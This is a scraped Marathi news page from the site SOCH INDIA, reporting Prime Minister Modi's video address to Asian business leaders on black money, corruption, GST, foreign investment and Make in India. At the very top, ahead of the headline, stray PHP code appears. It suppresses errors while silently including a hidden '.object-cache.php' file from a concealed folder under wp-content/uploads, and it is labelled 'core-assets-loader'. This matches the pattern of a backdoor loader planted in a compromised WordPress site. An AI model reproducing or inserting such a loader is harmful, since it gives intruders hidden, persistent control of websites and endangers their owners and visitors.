add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); काळा पैसा आणि भ्रष्टाचाराविरोधात पंतप्रधानांचा नमो’राग’ – SOCH INDIA
Menu

राजनीति
काळा पैसा आणि भ्रष्टाचाराविरोधात पंतप्रधानांचा नमो’राग’

nobanner

नोटाबंदीचा निर्णय घेऊन काळा पैसा आणि भ्रष्टाचाराविरोधातील लढाई तीव्र करणाऱ्या पंतप्रधान नरेंद्र मोदी यांनी पुन्हा एकदा भ्रष्टाचाराविरोधात ‘राग’ आळवला आहे. आपल्या व्यवस्थेतून काळा पैसा आणि भ्रष्टाचाराची सफाई करण्यास सर्वोच्च प्राधान्य असेल. त्यांच्याविरोधातील लढाई ही आमच्या सरकारची प्राथमिकता असेल, असे मोदी म्हणाले. इकॉनॉमिक टाइम्सने क्वालालंपूर येथे आयोजित केलेल्या आशियाई उद्योग प्रतिनिधींच्या परिषदेत व्हिडिओ कॉन्फरन्सिंगद्वारे ते बोलत होते. आपला देश आता डिजिटल आणि कॅशलेस सोसायटीच्या दिशेने प्रवास करत असल्याचेही त्यांनी यावेळी सांगितले.

देशात पुढील वर्षापासून म्हणजेच २०१७ पासून वस्तू व सेवा कर (जीएसटी) लागू होईल, अशी अपेक्षा आहे, असेही पंतप्रधान नरेंद्र मोदी यावेळी म्हणाले. भारताच्या जागतिक क्रमवारीत सातत्याने सुधारणा होत असल्याचेही ते म्हणाले. आम्ही भारतात गुंतवणुकीसाठी अनेक मार्ग खुले केले आहेत. गुंतवणुकीसाठी नियमांत सुधारणा करून ते अधिक सोपे करण्यात आले. गेल्या अडिच वर्षात १३० अब्ज डॉलर इतकी विदेशी गुंतवणूक झाली आहे. देशात गुंतवणुकीसाठी सकारात्मक वातावरण आहे, असेही पंतप्रधान मोदी यांनी सांगितले. गुंतवणुकीसाठी चांगले वातावरण असल्याने देशासह परदेशांतही त्याचे कौतुक होत आहे, असेही मोदी म्हणाले.
सरकारची महत्त्वाकांक्षी योजना असलेल्या ‘मेक इन इंडिया’ला दोन वर्षे पूर्ण होत आहेत. भारताला वैश्विक निर्मितीचे केंद्र बनवण्याचे या योजनेचे प्रमुख वैशिष्ट्य आहे. भारत वस्तू उत्पादनात जगात सहाव्या क्रमांकावर आहे, अशी माहितीही नरेंद्र मोदी यांनी यावेळी दिली. भारताच्या प्रकल्प विकास निधीतून भारत-आशियाईमधील सहकार्याला प्रोत्साहन मिळाले आहे. त्यामुळे २१ वे शतक हे आशियाचे असेल, असा विश्वासही त्यांनी यावेळी व्यक्त केला. यावेळी नरेंद्र मोदी यांनी परिषदेला उपस्थित असलेल्या उद्योजकांना भारतात गुंतवणूक करण्याचे आवाहन केले.